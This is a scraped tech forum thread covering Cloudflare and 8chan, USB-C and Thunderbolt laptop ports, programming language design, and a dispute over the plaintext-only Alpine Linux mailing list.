                                                                                                                        There’s an argument to be made that the resurging interest in systems programming languages through Rust, Swift and Go futureproofs experience in those areas.

                                                                                                                    2. 5

                                                                                                                      Memory safety advocate here. It is the most pressing issue because it invokes undefined behavior. At that point, your program is entirely meaningless and might do anything. Security issues can still be introduced without memory unsafety of course, but you can at least reason about them, determine the scope of impact, etc.

                                                                                                                    1. 13

                                                                                                                      It’s not censorship if it’s a private service, revoking service. It’s reasonable for Cloudflare to decide who it does and doesn’t want as customers.

                                                                                                                      What’s not reasonable is for Cloudflare to become a fundamental gatekeeper to infrastructure. As long as 8chan aren’t dependent upon Cloudflare to be able to operate, it’s not a problem. The moment they are, it is.

                                                                                                                      1. 10

                                                                                                                        What’s not reasonable is for Cloudflare to become a fundamental gatekeeper to infrastructure. As long as 8chan aren’t dependent upon Cloudflare to be able to operate, it’s not a problem. The moment they are, it is.

                                                                                                                        They aren’t. There’s multiple other options, including building a CDN yourself.

                                                                                                                        1. 3

                                                                                                                          It’s not to one needs to have a CDN to provide a website, however much the CDN providers want you to believe that, but including building a CDN yourself as a realistic[1] option is laughable.

                                                                                                                          [1] Yes, I know, you didn’t use that word.

                                                                                                                          1. 4

                                                                                                                            I don’t agree that building a CDN setup yourself isn’t feasible. It’s been done before CloudFlare was on the market. As an example, major FOSS projects do binary distribution, self-built on volunteer time.

                                                                                                                            It’s just expensive compared to just buying CFs services.

                                                                                                                            1. 2

                                                                                                                              Website in general: yes, you can build without a CDN.

                                                                                                                              Imageboards serve a lot of images(its in their name), which uses a lot of bandwidth. You really need a CDN for even a medium sized imageboard. 8chan is an imageboard.

                                                                                                                              1. 4

                                                                                                                                Imageboards serve a lot of images(its in their name), which uses a lot of bandwidth. You really need a CDN for even a medium sized imageboard. 8chan is an imageboard.

                                                                                                                                Yes, you really need a CDN. But images are also relatively easy to distribute and extremely disk-cache friendly. You can build a special-cased CDN for an imageboard. I don’t want so say it is cheap or as high-quality and can just be done on the side, but it is a relatively well-understood problem.

                                                                                                                                (I used to build image and video-CDN, FWIW)

                                                                                                                                1. 2

                                                                                                                                  Yes, but there is still price problems, and 8chan would rather not have those. Also, they probably want DDoS protection, as they host controversial content, and building your CDN to handle DDoS attacks adds even more cost. Needing to build your own CDN is not exactly a nice problem to have, and you rather just use somebody’s CDN.

                                                                                                                                  1. 4

                                                                                                                                    If 8chan’s business model is only cost effective because they are subsidized by CloudFlare that’s a problem with 8chan’s business model, not CloudFlare.

                                                                                                                                    Although I guess it is kind of a problem with CloudFlare as well.

                                                                                                                                    1. 3

                                                                                                                                      There’s no moral right that every cheap option is available to you unless you are a protected class as much as there is no moral right to your business model.

                                                                                                                                      1. 2

                                                                                                                                        Freedom of speech means the government can’t interfere with speech, not that uttering that speech should be as cost-effective as possible.

                                                                                                                                        1. -1

                                                                                                                                          Yes, but if there was a 1000$ tax on anything that you want to say publicly, it wouldn’t be free speech, would it?

                                                                                                                                          1. 4

                                                                                                                                            This is a non-sequitur. No such tax exists and if it did in a country with freedom of expression, it would be rightfully challenged in court.

                                                                                                                                            Before the internet, if you wanted to get your views out there, you had to pay to publish a newspaper, or a pamphlet, or a book. There was no expectation that you could do this for free.

                                                                                                                            1. 6

                                                                                                                              Ports. The t480s has 2 USB-A ports and 2 USB-C ports. It also has a full size HDMI, SD card slot, and full-size Ethernet. Is 0.14” difference in thinness worth access to the ports, user upgrade-ability, and the longevity of the keyboard?

                                                                                                                              Given that there are quite a few usb-c hubs[1], or single-use-case (eg. hdmi for presentations) dongles, out there that offer the ports in a breakout/hub/dongle format, I don’t desire a return of all the ports that I use so occasionally/seldom. Paying the size/thickness/weight tax all the time for something I use rarely isn’t a great tradeoff for me.

                                                                                                                              Then again, I use a laptop to be mobile, not as a desktop replacement. I realize that not everyone does this, so ymmv.

                                                                                                                              [1]: Kingston’s Nucleum has two USB 3.0 ports, an HDMI port, a SD and microSD card slot, one USB-C charging port and one regular USB-C port

                                                                                                                              1. 13

                                                                                                                                USB-C devices and hubs are pretty bad if you want to run more than one 4k60 display. Some can’t even do one. You can’t just plug in one hub and be done. I had to plug in three different USB-C dongles to get two 4k60 monitors, ethernet, keyboard, mouse, audio going on my 15” rMBP. Worse, USB-C slips and loses connectivity very easily.

                                                                                                                                The whole situation is asinine. Yes they’re meant to be mobile but I’m not paying $3k for something functionally equivalent to a netbook on steroids.

                                                                                                                                1. 6

                                                                                                                                  USB-C slips and loses connectivity very easily

                                                                                                                                  I missed this part earlier (or maybe you edited it in later). I very much agree with this one. I find usb-c a bit fiddlier than I would like, especially for power in comparison to the old apple magnetic (magsafe) power connectors. RIP magsafe.

                                                                                                                                  1. 2

                                                                                                                                    Multiple 4k60 displays seems a bit like a job for a desktop to me. That said, I agree that sucks. I wonder if it is a limitation of usb-c or just so few people with that use-case that nobody makes one that can do that yet.

                                                                                                                                    EDIT: hmm. looks like a displayport 1.2 limitation, based on some searching. DP 1.2 supports a single 4K 60 Hz monitor, two 1440p 60 monitors, and so on. DP 1.3 supports more (gfx card willing), but I think usb-c/thunderbolt3 is still DP1.2. bummer.

                                                                                                                                    1. 5

                                                                                                                                      It’s a MacBook Pro. I was running 2 displays off a 12” Thinkpad with the dock years and years ago.

                                                                                                                                      1. 4

                                                                                                                                        And you can still do so if those displays aren’t 4k. The terrible industry-wide state of getting pixels from ram to screen is not Apple’s doing and any attempt they make to fix it themselves will be met with endless pearl-clutching about “proprietary connections”

                                                                                                                                        1. 2

                                                                                                                                          I don’t mind how they fix it, I would prefer more port types than just USB-C. I think the decision to only have USB-C is aesthetic not functionality.

                                                                                                                                          1. 3

                                                                                                                                            There are functional reasons to want only one port on your device. However, their decision to go about it in classic Apple fashion, making the change out of nowhere, was certainly a head-scratcher.

                                                                                                                                        2. 4

                                                                                                                                          A MBP will absolutely run multiple 4K displays on a single port.

                                                                                                                                          Fuck, a Mac mini with just Intel graphics will run 2 4K displays, also from a single port.

                                                                                                                                          1. 2

                                                                                                                                            I get that it has Pro in the name. Did you use docking at every location where you worked with multiple monitors? Monitors these days also just seem huge to me. I can’t imagine someone having two 30+ inch 4k monitors on their desk ( that’s a /lot/ of terminals! ;) ) and yet choosing to drive it with a laptop. The workflow comparison between that and running undocked seems significant.

                                                                                                                                            I do wonder if some portion of people get laptops just because, or on the off chance that they might do something on the go, but then they end up using them docked 100% of the time anyway. Definitely not saying this was you though, as I have no clue how you worked or used your machines.

                                                                                                                                            1. 5

                                                                                                                                              Some people don’t buy laptops but their company only provides laptops. You have to be able to use the laptop as a desktop replacement if you need/want to. Heck, desktops are a vanishing breed, I imagine 90% of them are sold as gaming machines, these days.

                                                                                                                                              1. 2

                                                                                                                                                Chiming in with an anecdote, but I will emphasize this is my singular experience and preference.

                                                                                                                                                I have a 2015-era Thinkpad X1 Carbon whose built-in display is 1440p. Most of my programming uses, I use it docked to an additional 1440p display, sometimes two and turn off the built-in screen in favor of two full-sized monitors. In both cases they are only 25” displays, but the additional pixels are very appreciated. I don’t really see myself upgrading those to 4K screens, but I can imagine others who might.

                                                                                                                                                Some non-programming tasks also benefit greatly from the extra screen real-estate. I do will sometimes design in Figma (full screen on one monitor) with the second monitor hosting two windows: an editor window for referencing existing CSS in our projects, and a browser open to the Spec for the project whose design I am working on

                                                                                                                                                I am very much in the “laptop for the off chance they might do something on the go” crowd, but those times are far from insignificant. A lot of it is on-the-go comms with my team, doing project management and product management tasks. I definitely would not be effective with only a desktop, i.e. only a phone for on-the-go productivity.

                                                                                                                                          2. 0

                                                                                                                                            Limiting yourself to a USB-C (protocol) dock/device when you have TB3 ports but clearly want a not-average-joe functionality makes no sense to me.

                                                                                                                                          3. 3

                                                                                                                                            For me, this (multiple do-almost-anything ports, vs several each do-1-specific-thing ports) is the killer thing, but it works specifically for Macs because those ports are all TB3 not “just” USB-C.

                                                                                                                                            For basic things (i.e. the common complaint about the pre-TB3 MBP having “USB-A, HDMI and SD card” you can get a single USB-C ‘hub’ to provide all those ports, but whenever possible (and particularly for stuff relating to displays) I actually tend to get/suggest TB3 devices.

                                                                                                                                            1. 2

                                                                                                                                              My question — and the question of most people I know who have a newer MacBook Pro — why not both? Why not have USB-C ports and a HDMI? TB3 is awesome but it doesn’t have to be exclusive.

                                                                                                                                              1. 4

                                                                                                                                                It’s entirely possible Apples reasoning is aesthetic, but to me, a HDMI port is useless, and usually adding a HDMI port means you lose something else (see: the 2018 Mac mini that only supports 2x4k displays over TB3 because the third ‘supported’ display must be over HDMI).

                                                                                                                                                HDMI is also one of the least-hard “problems” to solve: you already need a HDMI cable, so use a different HDMI cable, with USB-C on one end.

                                                                                                                                                1. 2

                                                                                                                                                  You’re right. The Mac mini is a really good example of a combination of ports that folks really enjoy having access too.

                                                                                                                                                  This is all a tangent though, the reality is Apple is bent on making their laptops like their tablets and I wish they wouldn’t. In the end though it’s all preference.

                                                                                                                                                  1. 3

                                                                                                                                                    reality is Apple is bent on making their laptops like their tablets

                                                                                                                                                    Maybe the reality as you see it, but until they add touch screens to their laptops, I’m going to remain pretty dubious about that viewpoint.

                                                                                                                                                    1. 2

                                                                                                                                                      You missed my point. Not sure if that was deliberate or not.

                                                                                                                                                      The Mac mini has HDMI.. for some reason, but because it does, you can’t run 3 DisplayPort 4K displays from it. You can run two DP, and one has to be HDMI.

                                                                                                                                                      I would be happier if the mini had forgone HDMI for more TB3 ports (or even dedicated (mini) DisplayPort would be better than HDMI). I’d even give up the USB-A ports for more TB3 ports.

                                                                                                                                                      reality is Apple is bent on making their laptops like their tablets

                                                                                                                                                      I really cannot agree with that at all and I wonder if you somehow don’t understand that TB3 and USB-C are not the same thing.

                                                                                                                                                      1. 2

                                                                                                                                                        you can’t run 3 DisplayPort 4K displays […] I really cannot agree with that at all and I wonder if you somehow don’t understand that TB3 and USB-C are not the same thing.

                                                                                                                                                        Well, if we are going to be pedantic ;). If you use DisplayPort 4K displays, you are not using Thunderbolt 3, you are using the USB-C DisplayPort alternate mode. They are separate things, since there are also machines that have USB-C ports that support DisplayPort alt mode, but not Thunderbolt 3, such as the MacBook 12” [1].

                                                                                                                                                        So, why do you care about USB-C Thunderbolt 3 ports if you are going to hook up a DisplayPort display?

                                                                                                                                                        (BTW. it seems that Apple’s wording is intentionally muddy here for marketing purposes.)

                                                                                                                                                        [1] https://support.apple.com/en-us/HT206587

                                                                                                                                                        1. 1

                                                                                                                                                          I use a TB3 to dual DisplayPort adapter, so it only takes one port. I can guarantee you it is not using USB-C alt-mode.

                                                                                                                                                          1. 1

                                                                                                                                                            Now you are adding new data points. The default (and much cheaper) thing to do is to hook up a DisplayPort display directly to a Mac Mini or MacBook. Which is done using a regular passive DisplayPort <-> USB-C cable.

                                                                                                                                                            1. 1

                                                                                                                                                              No, I’m not.

                                                                                                                                                              You asked what’s wrong with a HDMI port. I told you: takes away video streams that would otherwise be available over DisplayPort.

                                                                                                                                                              Whether they’re routed over 3 USB-C to DP cables using Alt Mode, or via a TB3 adapter is irrelevant.

                                                                                                                                                              Go look at any tech forum with people having issues with displays: a decent chunk of them it’s because they’re using HDMI, because it was literally designed for TVs and receivers, being used for computer displays is an after thought, and it’s very apparent.

                                                                                                                                                              1. 1

                                                                                                                                                                HDMI doesn’t “take away” video streams, Apple does. If Apple really wanted, they could’ve added ability to use 3rd video stream using USB-C, but they didn’t. There is really nothing stopping them, except maybe the Intel chip that may not have a 3rd DP output.

                                                                                                                                                                1. 1

                                                                                                                                                                  The UHD 630 supports 3 displays over dp hdmi or edp.

                                                                                                                                                                  Apple chose to include hdmi which means one of those outputs from the igpu is used or “taken away” from potential as a DP output over USB-c/TB3.

                                                                                                                                                    2. 1

                                                                                                                                                      It’s entirely possible Apples reasoning is aesthetic, but to me, a HDMI port is useless, and usually adding a HDMI port means you lose something else (see: the 2018 Mac mini that only supports 2x4k displays over TB3 because the third ‘supported’ display must be over HDMI).

                                                                                                                                                      HDMI 2.0 supports 4k displays. The Mac Mini specs explicitly state that you can drive three 4k screens:

                                                                                                                                                      Up to three displays: Two displays with 4096-by-2304 resolution at 60Hz connected via Thunderbolt 3 plus one display with 4096-by-2160 resolution at 60Hz connected via HDMI 2.0

                                                                                                                                                      https://www.apple.com/mac-mini/specs/

                                                                                                                                                      1. 1

                                                                                                                                                        That’s what I said. It forces one display of the three to be hdmi, which IMO is garbage compared to DP. I’d rather have no HDMI and be able to drive 3 displays over TB3/DP

                                                                                                                                                        1. 1

                                                                                                                                                          Your comment was vague, it seemed to suggest that you cannot drive three 4k displays, but the point is that one of them has to be driven through HDMI. Fair enough.

                                                                                                                                                          Apple’s rationale is very logical. Quite some people use Mac Mini’s as media centers. They’ll have a TV with HDMI connectors and HDMI cables. So, it lowers the friction for a significant chunk of the audience for a tiny subset that insists on driving three 4k displays through DP. I am not saying that it is not a legitimate use case, but a niche. Apple will probably tell you to buy a Mac Pro or something.

                                                                                                                                                          1. 1

                                                                                                                                                            What is vague about this:

                                                                                                                                                            the 2018 Mac mini that only supports 2x4k displays over TB3 because the third ‘supported’ display must be over HDMI

                                                                                                                                                            I would bet money Apple do not include HDMI on a Mac mini for those few people who still try to run a media centre on one. Apple’s “solution” (in terms of what they support feature wise and expect people would use) is AppleTV.

                                                                                                                                                            They provide HDMI because it’s designed as a “bring your own display” device and a bunch of cheap shit displays have HDMI input rather than DP.

                                                                                                                                                    3. 2

                                                                                                                                                      Another reason is that the HDMI connector is bigger than the side of the MacBook Pro. Mini and micro HDMI connectors could fit but hey, even if it’s HDMI you need not-so-common adapters or special cables so USB-C/TB3 is not a bad alternative.

                                                                                                                                                  2. 2

                                                                                                                                                    The t480s does have 2 USB-C ports for breaking out to more exotic ports but having a nice selection of ports is great.

                                                                                                                                                  1. 3

                                                                                                                                                    What about a different approach - build as feature complete language as you can at the time, and when that’s done, only update standard library. While the initial effort to learn the language will by high, there won’t be any need to re‑learn the language, just to update onto standard library abstractions.

                                                                                                                                                    1. 7

                                                                                                                                                      For a programming language that followed something like this model, see Lua.

                                                                                                                                                    1. 3

                                                                                                                                                      Not a great article. Your DSL problem sounds like a non-problem, all nontrivial programs to some degree function like a DSL. And I mean seriously: you can’t choose a Python module to function like net/http? Again, a real non-problem. Who cares when the tooling came around, as long as you have it?

                                                                                                                                                      Your “perfect language” is probably in the set {Python, Lua, Racket, Go}.

                                                                                                                                                      1. 14

                                                                                                                                                        I think it’s a really great article, it voices some things I wanted to write down, but couldn’t find the time.

                                                                                                                                                        A few things from my consideration on keeping languages small:

                                                                                                                                                        • Do not only consider the cost of adding a feature, but also the cost of removing it.
                                                                                                                                                        • If 10% of users would gain 20% more utility from a feature being added, that still means that the other 90% lose utility, because they still need to learn and understand the feature they didn’t ask for. It’s likely that the equation ends up being negative for most features if you account for that.
                                                                                                                                                        • Don’t focus at being great at something. Focus on not being bad at anything.
                                                                                                                                                        • Not every problem needs a (language-level) solution. If something is verbose, so be it.
                                                                                                                                                        • Allow people to save code by being expressive, not by adding short-cuts for every individual annoyance.
                                                                                                                                                        • Design things by writing the code you want your users to write. Then make that work.
                                                                                                                                                        • Have a way to deprecate, migrate, and remove language and library elements from day one.

                                                                                                                                                        And a few of the standard ones:

                                                                                                                                                        • Eliminate special-cases.
                                                                                                                                                        • Something that can be a library should never be a language feature.
                                                                                                                                                        • Make sure all features are orthogonal to each other.
                                                                                                                                                        • The 80/20 rules doesn’t apply to language design.
                                                                                                                                                        • Make things correct first. Correct things are simple. Simple things are fast. – Focusing on “fast” first means sacrificing the other two.
                                                                                                                                                        1. 3

                                                                                                                                                          If 10% of users would gain 20% more utility from a feature being added, that still means that 90% lose utility. It’s likely that the equation ends up negative if you consider that those 90% still need to learn and understand the feature they didn’t ask for.

                                                                                                                                                          You don’t lose utility from a feature being added. That’s nonsensical.

                                                                                                                                                          1. 23

                                                                                                                                                            You don’t lose utility from a feature being added. That’s nonsensical.

                                                                                                                                                            You definitely can for some features. Imagine what would happen if you added the ability to malloc to Java, or the ability to mutate a data structure to Erlang.

                                                                                                                                                            But of course this doesn’t apply to most features.

                                                                                                                                                            1. 1

                                                                                                                                                              if you added the ability to malloc to Java

                                                                                                                                                              Java has that already? Various databases written in Java do allocate memory outside the GC heap. You can get at malloc via JNI, as well as using the direct ByteBuffers thing that they kinda encourage you to stick to for this.

                                                                                                                                                              1. 4

                                                                                                                                                                Java has that already?

                                                                                                                                                                Yes, and when it was added it was a huge mistake.

                                                                                                                                                                Everyone I know who uses the JVM won’t touch JNI with a ten-foot pole.

                                                                                                                                                              2. 1

                                                                                                                                                                I think it pretty much applies to all features.

                                                                                                                                                                For whatever utility you get out of a feature, you have to take into account that when users had to learn 50 features before to use the language, they now need to understand 51.

                                                                                                                                                                This issue is usually discarded by those who propose new features (expert users), because the have already internalized the 50 features before. Their effort is just “learn this single new thing”, because they know the rest already.

                                                                                                                                                                But for every new user, the total amount of stuff to learn just increased by 2%.

                                                                                                                                                                That doesn’t sound much but if you think that – whatever language you use – 99.99% of people out there don’t know your language.

                                                                                                                                                                It’s hard to offset making things worse for 99.99% by adding a “single” great new feature for the 0.01%.

                                                                                                                                                                1. 2

                                                                                                                                                                  For whatever utility you get out of a feature, you have to take into account that when users had to learn 50 features before to use the language, they now need to understand 51.

                                                                                                                                                                  Yes, but this is a completely different category from “this language had an important feature, and by adding this new feature, we destroyed the old feature”.

                                                                                                                                                                  Adding mutability to Erlang doesn’t just make the language more complicated; it destroys the fundamental feature of “you can depend on a data structure being immutable”, which makes the language dramatically worse.

                                                                                                                                                                  1. 1

                                                                                                                                                                    but this is a completely different category

                                                                                                                                                                    Yes, but this is the category I had in mind when I wrote the list.

                                                                                                                                                                    The point the GP mentioned is above listed under “And a few of the standard ones”:

                                                                                                                                                                    Make sure all features are orthogonal to each other.

                                                                                                                                                              3. 7

                                                                                                                                                                Don’t just think about the code you write; think about the code you need to read that will be written by others. A feature that increases the potential for code to become harder to read may not be worth the benefit it provides when writing code.

                                                                                                                                                                1. 7

                                                                                                                                                                  C++ comes to mind. I think it was Ken Thompson who said it’s so big you only [need to] use a certain subset of it, but the problem is that everyone chooses a different subset. So it could be that you need to read someone else’s C++ but it looks like a completely different language. That’s no good!

                                                                                                                                                                  1. 7

                                                                                                                                                                    You don’t lose utility from a feature being added.

                                                                                                                                                                    That’s nonsense. Consider the case of full continuations, as in Scheme: implementing them requires that certain performance optimisations are impossible, which makes all code — even code which doesn’t directly use them — perform more slowly. Granted, this can be somewhat mitigated with a Sufficiently Smart Compiler™, but not completely.

                                                                                                                                                                    1. 4

                                                                                                                                                                      “Lose utility” is not the right framing. It’s more like increased cognitive overhead.

                                                                                                                                                                      1. 3

                                                                                                                                                                        You certainly pay a cost, though. That’s indisputable.

                                                                                                                                                                        1. 2

                                                                                                                                                                          Maybe “utility” is the wrong word for the thing you lose but you definitely lose something. And the amount of that thing you lose is a function of how non-orthogonal the new feature is to the rest of the language: the less well integrated the feature is, the worse your language as a whole becomes.

                                                                                                                                                                      2. 8

                                                                                                                                                                        Thanks for the feedback. While I haven’t worked on any Common Lisp program large enough to have turned itself into a DSL, I also know that for any task, there are usually a few libraries that each don’t work for more than 80% of the use-cases for such a library. Whether this is caused by the language itself or its community, I don’t know, but I think it has more to do with the way that CL encourages building abstractions.

                                                                                                                                                                        As for the fact that Python doesn’t have a net/http equivalent in its standard library, I remember this being a somewhat major driver for Go’s adoption. You could build a simple website without having to choose any kind of framework at all. It was really easy to get something together quickly and test-drive the language, which is super important for getting people to use it. Also, having something that creates a shared base for “middleware” and frameworks on top of the standard library had to have led to better interoperability within the early Go web ecosystem.

                                                                                                                                                                        I will concede that good tooling shortly after launch is the least important point, but really spectacular tooling is a good enough selling point for me to use a language on its own, so I think it does matter, since it allows people to write larger programs without waiting so much for the language to mature.

                                                                                                                                                                        It appears that I did a poor job of communicating that my list of points were geared towards new languages today (or ones of a similar age to Go), but I will absolutely play with Tcl and continue to investigate other existing options.

                                                                                                                                                                        1. 1

                                                                                                                                                                          As for the fact that Python doesn’t have a net/http equivalent in its standard library

                                                                                                                                                                          Well, there technically is http with http.client and http.server modules, just it’s so old that it’s abstractions are no longer abstract. It seems that nowdays python’s standard library needs updated abstractions, but that no wouldn’t have any use, as there are 3rd party libraries providing those abstractions(e.g. requests)

                                                                                                                                                                      1. 2

                                                                                                                                                                        Is 0.14” difference in thinness worth access to the ports, user upgrade-ability, and the longevity of the keyboard?

                                                                                                                                                                        0.14” plus the obvious differences in construction quality? Yes. A hundred times yes.

                                                                                                                                                                        1. 7

                                                                                                                                                                          From the first look it might seem like cheap plastic. But, the looks are deceiving. IMO, most Thinkpads are second by toughness only to thoughbooks. The build quality is great. The plastic feels good, is resistant to scratches, and even if you manage to scratch it, the texture hides it. It has a metal frame under the plastic, which makes it very hard to break. Meanwhile, Apple sandwiches everything between two sheets of machined aluminum, which while better than plastic, isn’t that strong.

                                                                                                                                                                          1. 3

                                                                                                                                                                            I know you meant to type toughbooks, however I would really like to see a thoughtbook.

                                                                                                                                                                          2. 7

                                                                                                                                                                            Are you actually implying that Thinkpads are poorly built? Thinkpads are the laptops you’ll find in Fallout-style post-apocalyptic shelters. I’ve been using Thinkpads for 12 years now… Most of them are indestructible by usual hardware standards :-)

                                                                                                                                                                            1. -1

                                                                                                                                                                              Are you actually implying that Thinkpads are poorly built?

                                                                                                                                                                              Yes, compared to Apple laptops, Thinkpads are poorly built.

                                                                                                                                                                              1. 5

                                                                                                                                                                                It’s clear from the language used by others here that Thinkpads are romanticised. I mean, I like them too, but it’s going to be hard for any of us to evaluate them honestly when much of the sentiment in this thread is borne out of “screw Apple!”. I agree that MacBook build quality is second to none (besides the flawed butterfly switches).

                                                                                                                                                                            2. 6

                                                                                                                                                                              I thought this too until I held my t480s in my hands. It’s solid as a rock: no flex or give in the body at all. Everyone who has held it remarks that it feels solid. Time will tell on longevity but I’m pretty optimistic.

                                                                                                                                                                            1. 2

                                                                                                                                                                              Wouldn’t this quickly stop working of URL length limits in browsers? There is only one character so for a new URL you just +1 one character.

                                                                                                                                                                              Edit: I looked at the source code, it actually uses 2 different characters, so the encoding is much more effective, and will handle around 2^2000 url’s, which is probably more than the underlying storage could store(the size of storage needed is far more than is comprehensible). I think that it could even be done without a storage layer by encoding the URL with zero-width characters. That could store url’s up to 250 chars long reliably and maybe longer ones, depending on the browser.

                                                                                                                                                                              1. 3

                                                                                                                                                                                I thought that I will see EFAIL somewhere in there.

                                                                                                                                                                                1. 1

                                                                                                                                                                                  Yes! That is not a PGP issue, that is a mail client issue.

                                                                                                                                                                                  1. 2

                                                                                                                                                                                    Concretelly, its HTML mail issue.

                                                                                                                                                                                    1. 2

                                                                                                                                                                                      It is not. It is issue with email clients that can’t correctly parse multipart/mixed content, and did not separate text/html parts from application/pkcs7-mime parts. HTML only allowed sending those contents out to the attacker. Without botched parsing there wouldn’t be any problems. But still, it is true that HTML allowed to exfiltrate the data.

                                                                                                                                                                                1. 14

                                                                                                                                                                                  i’m not sure if this should be recognized by commenting here, as it feels outright like a troll attempt.

                                                                                                                                                                                  assuming this is a reaction to https://lobste.rs/s/ktvzwl/use_plaintext_email : asking users and giving directions to use plaintext isn’t “gatekeeping”. by using this word you apply a negative spin on the plaintext email site, maybe even on the author. i don’t want to see this kind of conversation here.

                                                                                                                                                                                  edit (after the archived version was linked here):

                                                                                                                                                                                  Request for Guillotine: 1

                                                                                                                                                                                  really? that low?

                                                                                                                                                                                  Upon the dismantling of the original mailing lists due to the power vacuum caused by several high-profile Alpine Linux core contributors leaving the project due to burnout or personal reasons, the individual behind SourceHut, aka sr.ht, stepped up to provide new mailing list software in order to make themselves an instrumental part of the Alpine Linux ecosystem and deeply embedded in the core development team. This is commonly described as a “position of power”.

                                                                                                                                                                                  Scientists have not yet discovered whether this “position of power” in the Alpine Linux community has yielded any benefits that are typically borne of “positions of power” in enterprises that matter, such as fame, wealth, or high-altitude sexual escapades. While it is too early to make a total judgement call, there is no indication that any of these facets of being in a “position of power” are to become true.

                                                                                                                                                                                  yes, that low. throw more dirt.

                                                                                                                                                                                  1. 9

                                                                                                                                                                                    As far as I’m aware, according to the Fediverse feed of the author of “useplaintext.email”[1], the site sprang up as a response to people asking why - all of a sudden - they couldn’t contribute to the mailing list[2] in the IRC channel. This happened without any warning to any user or developer, and was solely at the whims of the individual who was now in charge of the mailing list software (and made the useplaintext.email website).

                                                                                                                                                                                    The individual who wrote that site locking people out from contributing to a Linux distribution because they came into control of the mailing lists does, however, probably qualify.

                                                                                                                                                                                    The submitter of this link actually orphaned all of their packages because going through the hassle of having a different email client just to contact the mailing list was not worth the hassle for what is ultimately a volunteer effort.

                                                                                                                                                                                    1. https://cmpwn.com/@sir/102492883435461992
                                                                                                                                                                                    2. https://lists.alpinelinux.org/~alpine/devel/%3CBVGP7GB8D8FN.2Z691JGTQHQ7L%40homura%3E
                                                                                                                                                                                    1. 3

                                                                                                                                                                                      thats all well, but it doesn’t warrant “Request for Guillotine” and smear campaigns. dropping the packages is unfortunate, but if it feels that it is the right thing to do it’s a personal decision.

                                                                                                                                                                                      good alternatives are:

                                                                                                                                                                                      • try to discuss it reasonably, preferably not via a microblogging service which are a shitty medium to to that.
                                                                                                                                                                                      • write a patch for the mailing list software so that only the html part is dropped, and ask for inclusion of this patch.
                                                                                                                                                                                      • ask if you can host the mailinglist instead, with the settings you want. this bears the risk that other people are fine with blocking html mails and your offer is politely declined.
                                                                                                                                                                                      • fork the distribution.
                                                                                                                                                                                      1. 8

                                                                                                                                                                                        write a patch for the mailing list software so that only the html part is dropped, and ask for inclusion of this patch.

                                                                                                                                                                                        I personally did just that, and it was rejected. I also tried to offer a self-reply patch, and that was also denied:

                                                                                                                                                                                        21:47:53 <awilfox> I didn't see any question about this on the discuss archives: is there a way to have self-replies copied to your email?  on virtually all mailing lists I'm subscribed to, when I email the list I receive a copy back (which is reassuring that the ML software did not eat it and there were no MX issues).  I'm not getting self replies on sr.ht MLs.
                                                                                                                                                                                        21:48:18 <ddevault> no, this is not possible
                                                                                                                                                                                        21:48:39 <awilfox> would a patch adding this option be considered?
                                                                                                                                                                                        21:48:47 <ddevault> probably not
                                                                                                                                                                                        
                                                                                                                                                                                        1. 3

                                                                                                                                                                                          try to discuss it reasonably, preferably not via a microblogging service which are a shitty medium to to that.

                                                                                                                                                                                          Yeah, microblogging services are certainly not ideal. It’s been discussed at length in the IRC channels (which are the official communication medium for the project). I’ve seen discussions about lack of action after said discussions in places elsewhere. Namely, the person in control doubling down on leaving it disabled.

                                                                                                                                                                                          write a patch for the mailing list software so that only the html part is dropped, and ask for inclusion of this patch.

                                                                                                                                                                                          The mailing list software is developed by the same person who runs it. I believe this was raised and was responded to with a firm “no”.

                                                                                                                                                                                          ask if you can host the mailinglist instead, with the settings you want. this bears the risk that other people are fine with blocking html mails and your offer is politely declined.

                                                                                                                                                                                          No idea where anyone is at with that. I will point out this part from the site:

                                                                                                                                                                                          This was described by the Alpine Linux project lead as:

                                                                                                                                                                                          a surprise and unintentional (except from a single person)
                                                                                                                                                                                          super annoying to get locked out of participation like this
                                                                                                                                                                                          imho, unacceptable

                                                                                                                                                                                          So I’m not sure there’s a consensus even there.

                                                                                                                                                                                          fork the distribution.

                                                                                                                                                                                          I don’t know if you can get more fringe than a fork of something like Alpine Linux. Perhaps forking Void Linux? Forking over issues that are surmountable with encouragement and a correct understanding (e.g., it’s inconvenient for developers who use mobile devices, it breaks screen readers (and consequently affects those with low or no vision), and provides no feedback to users if their emails are dropped) is, in my view, pointless. I personally feel forking a project is kind of a “last resort” sort of thing.

                                                                                                                                                                                          That said, I haven’t ever forked a project, so perhaps it isn’t. I’d appreciate your own view on that if you disagree.

                                                                                                                                                                                          1. 5

                                                                                                                                                                                            Note: I haven’t been able to find the source for the Alpine Linux project lead quote, so it might as well be fake

                                                                                                                                                                                            1. 2

                                                                                                                                                                                              Yeah, microblogging services are certainly not ideal. It’s been discussed at length in the IRC channels (which are the official communication medium for the project). I’ve seen discussions about lack of action after said discussions in places elsewhere. Namely, the person in control doubling down on leaving it disabled.

                                                                                                                                                                                              i’m not involved in alpine linux, so i didn’t know about these discussions.

                                                                                                                                                                                              The mailing list software is developed by the same person who runs it.

                                                                                                                                                                                              i see it this way: the developer has the spare resources to host the list, providing it for free to the alpine linux community. i don’t think that the community is forced by anyone to use it. if the majority decides the list software is fine, then that’s the consensus. of the project lead thinks it’s unacceptable, it is maybe time to look for an other place to host the list at. blaming someone giving out free things is just plain wrong.

                                                                                                                                                                                              I don’t know if you can get more fringe than a fork of something like Alpine Linux. Perhaps forking Void Linux? Forking over issues that are surmountable with encouragement and a correct understanding (e.g., it’s inconvenient for developers who use mobile devices, it breaks screen readers (and consequently affects those with low or no vision), and provides no feedback to users if their emails are dropped) is, in my view, pointless. I personally feel forking a project is kind of a “last resort” sort of thing.

                                                                                                                                                                                              my list was in increasing “drama-steps”, yes. forking almost always isn’t the right solution.

                                                                                                                                                                                              my point is that the reaction here (calling for beheading) isn’t a way to fix issues, it’s just flaming because something isn’t the way one wants it to. i know that it is hard today for many people if their points of view aren’t accepted as the only right one, but then it may be time for a fork instead of destructive behavior.

                                                                                                                                                                                              That said, I haven’t ever forked a project, so perhaps it isn’t. I’d appreciate your own view on that if you disagree.

                                                                                                                                                                                              i neither, but there are “forks” of slackware for example, which mostly are additional package sets and tools though. forking doesn’t has to mean that you go completely different paths.

                                                                                                                                                                                              1. 5

                                                                                                                                                                                                I’m only going to quote short parts, not to take them out of context but simply to make this thread easier to read as it gets further indented left.

                                                                                                                                                                                                i’m not involved in alpine linux, so i didn’t know about these discussions.

                                                                                                                                                                                                Fair. Me neither, other than being in the IRC channels. I already have a bouncer on Freenode so I just idle in there. I use Alpine quite a bit for Docker so it’s nice to see what’s going on in there sometimes.

                                                                                                                                                                                                i see it this way …

